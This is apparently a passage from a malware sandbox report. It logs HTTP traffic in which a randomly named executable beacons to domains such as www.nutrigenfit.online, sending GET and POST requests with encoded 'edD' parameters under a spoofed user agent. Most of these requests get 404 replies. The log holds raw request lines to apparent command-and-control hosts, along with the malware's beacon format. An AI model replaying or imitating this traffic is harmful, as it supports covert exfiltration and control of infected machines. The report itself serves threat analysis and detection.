                                                                                                                                Data Raw: 65 64 44 3d 41 41 70 39 6e 75 73 72 37 43 44 4d 72 74 68 77 58 77 52 75 4c 63 75 38 68 56 6d 56 69 44 6c 7a 64 65 6b 41 43 45 63 48 6d 79 52 67 58 6e 79 63 69 71 66 57 52 68 74 62 50 2b 79 43 49 36 31 52 55 35 55 4c 76 69 41 39 6b 71 58 48 6c 4d 55 4e 55 69 64 6d 47 76 79 33 68 73 5a 74 35 34 62 66 65 6a 72 41 53 4b 78 36 53 55 75 44 43 63 7a 38 5a 64 72 4d 53 53 47 77 65 4a 44 53 30 55 57 43 4e 41 51 73 75 2f 4c 5a 6f 38 61 58 4f 6d 78 6f 78 4e 6f 70 65 7a 70 4e 66 74 52 52 78 36 50 70 69 43 4a 6a 6e 52 41 71 78 34 58 79 4c 4c 54 33 5a 6e 4a 58 78 32 62 6b 4c 6e 35 43 71 4f 6c 63 62 7a 64 68 39 5a 38 51 32 32 76 58 46 6b 64 72 67 78 2b 74 73 73 44 38 5a 4e 6a 46 4c 39 59 30 46 47 4a 75 44 4c 6c 6f 32 33 62 46 69 7a 34 77 64 49 6f 33 68 54 4f 5a 59 77 43 76 37 63 47 4e 75 78 46 46 68 51 6d 59 46 63 5a 49 79 73 49 35 2b 31 55 31 5a 2f 46 31 33 43 6c 33 34 36 7a 34 56 67 74 45 52 6d 67 7a 37 6e 4b 71 31 4e 79 63 73 2b 5a 58 46 4f 79 72 6f 45 7a 78 4b 39 35 46 44 58 66 52 46 4e 6b 41 65 30 55 7a 7a 50 [TRUNCATED]
                                                                                                                                Data Ascii: edD=AAp9nusr7CDMrthwXwRuLcu8hVmViDlzdekACEcHmyRgXnyciqfWRhtbP+yCI61RU5ULviA9kqXHlMUNUidmGvy3hsZt54bfejrASKx6SUuDCcz8ZdrMSSGweJDS0UWCNAQsu/LZo8aXOmxoxNopezpNftRRx6PpiCJjnRAqx4XyLLT3ZnJXx2bkLn5CqOlcbzdh9Z8Q22vXFkdrgx+tssD8ZNjFL9Y0FGJuDLlo23bFiz4wdIo3hTOZYwCv7cGNuxFFhQmYFcZIysI5+1U1Z/F13Cl346z4VgtERmgz7nKq1Nycs+ZXFOyroEzxK95FDXfRFNkAe0UzzPBSCq7WkmoNgP4BYiFtOw/6tzOMVJScsFHM+8+Av2VmjOHfifMZYFO0me3jiknzIYouqQok6JGZqiXjjpEsVAAtzYYVBS2hX9oB/c5ahpQVQl5onE9/XrSPqky66MYOUIozsaXjt+86lmfCCrxuQipXlpa69AJmmO/OOTpkk4zVFycCmbfjOWeJ26tDxCBLQFVel85QdYC27sYkfHi31y5KFbvGpGhwr7sdHYGknPzMYIcsI6a7Wkhn/WbvAXUkr12t4HC8B/zM6xYE6aQoEE4DH+SO8XGoqAUxkgVd+Q/xFN2l+2aklMU0C2iqFsrKWFgqOpF+FEJr/g9s92KDrh7Gk4116XmCaKHYtQpAHJ2e5+yxkB+S9C4teNYxyQU0sTP2eFYQiWfJMcB6Bgez3alQJFeyn1SOqsOXTE/IfNniTj61iRcLB6u/TW5O8z+Fqj0SuMTb2zzyiMfhzpqf7S/DatIRF5Mva4v7VEa5HkofVU9Fjpr0VyhHNWF6t6MV6CL5hkmKzcjthmxaitvkbVYiNc8M61Qt4Ykln11L3XH7V9ktyHKpqY/aF7IVpzb3UQMcgG9VI46AejsLwTocQrBJcrPrfHFuWFZIuebIiQjkpHIhQehJv07+4SunQpudUVm+9/P6jLkTE4iMj0zUtdkS6I4nT8/akpkq [TRUNCATED]
                                                                                                                                Oct 29, 2024 16:55:54.805387020 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                Connection: close
                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                pragma: no-cache
                                                                                                                                content-type: text/html
                                                                                                                                content-length: 1251
                                                                                                                                date: Tue, 29 Oct 2024 15:55:54 GMT
                                                                                                                                server: LiteSpeed
                                                                                                                                vary: User-Agent
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                                Oct 29, 2024 16:55:54.805699110 CET271INData Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20
                                                                                                                                Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                28192.168.2.849736163.44.176.12805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:55:56.447685957 CET425OUTGET /mivl/?edD=NCBdkbAo51Pk6OQCOHBLNPGGoFWb7jFDRfsqOlllsQkjLkqguOrgRg1KSY2RNLpxIpBa/WYuubaTkbJsfRdnK6r1gpJDlK+mMheAcqBYNXKJFvncR+Lje3KwNZ7V3SHyOg==&mRR=Vxudf0fHzLw84n3P HTTP/1.1
                                                                                                                                Host: www.broork.sbs
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:55:57.317842960 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                Connection: close
                                                                                                                                cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                pragma: no-cache
                                                                                                                                content-type: text/html
                                                                                                                                content-length: 1251
                                                                                                                                date: Tue, 29 Oct 2024 15:55:57 GMT
                                                                                                                                server: LiteSpeed
                                                                                                                                vary: User-Agent
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0
                                                                                                                                Oct 29, 2024 16:55:57.317871094 CET271INData Raw: 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20
                                                                                                                                Data Ascii: .15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this si


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                29192.168.2.849737195.110.124.133805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:02.589799881 CET696OUTPOST /uye5/ HTTP/1.1
                                                                                                                                Host: www.nutrigenfit.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.nutrigenfit.online
                                                                                                                                Referer: http://www.nutrigenfit.online/uye5/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 204
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 32 37 74 56 58 2f 46 51 2f 78 6b 61 6a 5a 44 69 65 6a 43 6a 50 56 39 6a 4d 64 4d 64 49 48 44 6a 30 75 71 52 62 30 2f 42 45 75 64 36 54 4c 6d 34 2b 68 36 2f 4d 49 52 4e 76 67 59 4e 76 6c 4f 6b 59 77 49 6b 62 34 4c 6b 47 4b 57 6b 44 7a 56 68 41 6e 6d 59 75 75 44 34 66 38 45 72 4a 70 42 54 72 37 4b 33 51 6f 62 76 79 57 67 66 6d 41 58 42 63 77 44 70 57 45 42 77 2f 6a 6c 38 6e 58 4b 61 76 4e 4a 62 51 35 50 68 6a 52 75 54 55 74 4e 78 4e 35 34 77 6b 4e 51 61 68 43 75 34 43 6b 4a 64 31 36 58 78 4c 41 31 61 31 46 39 77 4d 2b 4f 53 4a 32 64 2f 70 44 75 48 30 62 30 74 75 43 34 37 52 77 6b 6b 6e 2b 6b 3d
                                                                                                                                Data Ascii: edD=27tVX/FQ/xkajZDiejCjPV9jMdMdIHDj0uqRb0/BEud6TLm4+h6/MIRNvgYNvlOkYwIkb4LkGKWkDzVhAnmYuuD4f8ErJpBTr7K3QobvyWgfmAXBcwDpWEBw/jl8nXKavNJbQ5PhjRuTUtNxN54wkNQahCu4CkJd16XxLA1a1F9wM+OSJ2d/pDuH0b0tuC47Rwkkn+k=
                                                                                                                                Oct 29, 2024 16:56:03.415945053 CET367INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:03 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 203
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                30192.168.2.849738195.110.124.133805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:05.139717102 CET716OUTPOST /uye5/ HTTP/1.1
                                                                                                                                Host: www.nutrigenfit.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.nutrigenfit.online
                                                                                                                                Referer: http://www.nutrigenfit.online/uye5/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 224
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 32 37 74 56 58 2f 46 51 2f 78 6b 61 6a 35 7a 69 5a 30 57 6a 4e 31 39 67 4a 64 4d 64 42 6e 44 76 30 75 57 52 62 31 72 52 46 63 70 36 53 70 75 34 39 6a 43 2f 4c 49 52 4e 6b 41 59 49 77 56 4f 72 59 77 4e 48 62 34 48 6b 47 4c 32 6b 44 32 70 68 41 55 4f 62 75 2b 44 36 65 4d 45 70 47 4a 42 54 72 37 4b 33 51 6f 65 41 79 57 6f 66 6d 54 66 42 63 52 44 75 66 6b 42 78 38 6a 6c 38 32 6e 4b 6b 76 4e 49 49 51 34 54 62 6a 53 61 54 55 76 46 78 55 49 34 78 39 64 52 52 2b 53 76 47 4f 45 59 79 7a 37 76 70 4b 6a 64 72 71 6d 51 4c 4a 49 2f 34 54 55 56 35 71 44 47 73 30 59 63 62 72 31 6c 54 4c 54 30 55 35 70 77 66 46 59 6a 4f 6a 67 51 56 61 4f 4f 75 4b 6c 6c 38 46 37 44 75
                                                                                                                                Data Ascii: edD=27tVX/FQ/xkaj5ziZ0WjN19gJdMdBnDv0uWRb1rRFcp6Spu49jC/LIRNkAYIwVOrYwNHb4HkGL2kD2phAUObu+D6eMEpGJBTr7K3QoeAyWofmTfBcRDufkBx8jl82nKkvNIIQ4TbjSaTUvFxUI4x9dRR+SvGOEYyz7vpKjdrqmQLJI/4TUV5qDGs0Ycbr1lTLT0U5pwfFYjOjgQVaOOuKll8F7Du
                                                                                                                                Oct 29, 2024 16:56:06.013858080 CET367INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:05 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 203
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                31192.168.2.849739195.110.124.133805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:07.682970047 CET1733OUTPOST /uye5/ HTTP/1.1
                                                                                                                                Host: www.nutrigenfit.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Origin: http://www.nutrigenfit.online
                                                                                                                                Referer: http://www.nutrigenfit.online/uye5/
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Connection: close
                                                                                                                                Content-Length: 1240
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Data Raw: 65 64 44 3d 32 37 74 56 58 2f 46 51 2f 78 6b 61 6a 35 7a 69 5a 30 57 6a 4e 31 39 67 4a 64 4d 64 42 6e 44 76 30 75 57 52 62 31 72 52 46 63 78 36 53 61 32 34 2b 45 75 2f 4b 49 52 4e 74 67 59 4a 77 56 4f 4d 59 77 31 62 62 34 37 53 47 50 47 6b 43 55 78 68 43 6c 4f 62 6c 2b 44 36 62 38 45 6f 4a 70 42 47 72 34 79 7a 51 6f 4f 41 79 57 6f 66 6d 53 50 42 56 67 44 75 54 45 42 77 2f 6a 6c 4f 6e 58 4b 66 76 4e 41 59 51 34 57 35 6a 68 43 54 61 76 56 78 50 61 41 78 31 64 52 54 39 53 76 4f 4f 45 55 74 7a 37 44 66 4b 69 70 4e 71 6c 41 4c 4c 66 6d 58 58 55 46 5a 38 43 71 6e 31 4a 46 35 72 45 64 73 4c 43 42 75 38 34 41 39 4c 49 76 34 31 67 4d 65 5a 63 2f 69 5a 78 6c 6d 48 65 71 39 78 62 51 4d 56 4d 35 34 2f 74 6f 44 31 6e 70 4b 59 6b 67 69 42 72 52 42 77 34 73 73 62 74 67 43 67 78 6f 30 6d 32 45 49 4b 6f 43 4b 58 77 33 6b 66 76 7a 39 33 48 41 4d 79 6b 59 6f 4b 68 76 63 63 63 46 6f 42 38 61 4c 67 44 74 2f 58 42 76 47 77 4e 78 71 62 55 54 7a 67 70 49 6b 78 65 6e 37 30 34 69 6e 75 44 72 6f 54 41 56 36 6b 67 51 78 72 61 [TRUNCATED]
                                                                                                                                Data Ascii: edD=27tVX/FQ/xkaj5ziZ0WjN19gJdMdBnDv0uWRb1rRFcx6Sa24+Eu/KIRNtgYJwVOMYw1bb47SGPGkCUxhClObl+D6b8EoJpBGr4yzQoOAyWofmSPBVgDuTEBw/jlOnXKfvNAYQ4W5jhCTavVxPaAx1dRT9SvOOEUtz7DfKipNqlALLfmXXUFZ8Cqn1JF5rEdsLCBu84A9LIv41gMeZc/iZxlmHeq9xbQMVM54/toD1npKYkgiBrRBw4ssbtgCgxo0m2EIKoCKXw3kfvz93HAMykYoKhvcccFoB8aLgDt/XBvGwNxqbUTzgpIkxen704inuDroTAV6kgQxra3m/x/pOXMTF2s0SEclYvwbFCSvw2Q8M9T6UM34hS2L4P4nM+Rj5hIEMzisUZsAulWulBSiyGyA/vkbmaX7wKHjkpRT6YhzZp+9tFkY1GGGyzTxO9MseAYl0Gb0kgYrLOBzPorinQ9dybSbWZz29jnX6zbUSF8hvdW2ZVEVwlEjdlbiih6sSAywylQGsZYqhg8VMsCFMAp6ykuU6B2WBCTHn75wgEDnVJGqacB/K51o8hXtrxOMQLRQDbGmzArZdzAijsSTFdNf6h6f0bGcHv90jvxUSx0yWYlFQrE2nEaQrC4orRuxI8G/oOWBwNPOhjO5n/I/DsSVJS4UGF2F5O7aB4sXGQmXr8+IVx9Z8F9uj4oShKDliy8tdCGSCslvohtMzk9yW+dOBSPQPQuGtNobHTPf3CoMHtAZ5xg7SBShlhIYPPQPbrRygDy23gqL1zhgPs9DG9UuEcKsq7pWCuNrEMMPXC8OgR18OBgfEx+SQNMpB/nHAOHFLEzywh3zfxIJ78gZKG1SwJ3w6TMjYwq8kBc0D8BRK6jvYT8HVGF33YUHlhRM02GVtpsEixuIZj+EvXNOSxQ/zEFk0BOjLs9ASr0Rb5h1FtEWx6MN07TtUewRhIQt1Rk2hbBZgn/haf0J4iRr9ZbjqbhLbqmb2D9Kq3d30ejeU6vQ [TRUNCATED]
                                                                                                                                Oct 29, 2024 16:56:08.795032978 CET367INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:08 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 203
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>
                                                                                                                                Oct 29, 2024 16:56:08.796650887 CET367INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:08 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 203
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 75 79 65 35 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /uye5/ was not found on this server.</p></body></html>


                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                32192.168.2.849740195.110.124.133805072C:\Program Files (x86)\OFtyZipvaoDSZWmBUsqGFRTWDyGOJtFBZOTWXZxUYCoQWHLDIwMNvCJLSZCxJBUIefvvKSYLE\XORjEgwNIUb.exe
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                Oct 29, 2024 16:56:10.230237961 CET433OUTGET /uye5/?mRR=Vxudf0fHzLw84n3P&edD=75F1ULhw6FwEjpnDA0ShEFdlFdwdGFO+6cO+diyrF+sYFY6hrAWtaaFZiFMruwmlEHMkL4DDBtvLLE4rNUa6rOrOasIwOIgL2b+vXbiOxUsIxCPoWDvEXykJs0FHlhf94g== HTTP/1.1
                                                                                                                                Host: www.nutrigenfit.online
                                                                                                                                Accept: */*
                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                Connection: close
                                                                                                                                User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; HTC Desire 610 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.93 Mobile Safari/537.36
                                                                                                                                Oct 29, 2024 16:56:11.066350937 CET367INHTTP/1.1 404 Not Found
                                                                                                                                Date: Tue, 29 Oct 2024 15:56:10 GMT
                                                                                                                                Server: Apache
                                                                                                                                Content-Length: 203
                                                                                                                                Connection: close
                                                                                                                                Content-Type: text/html; charset=iso-8859-1
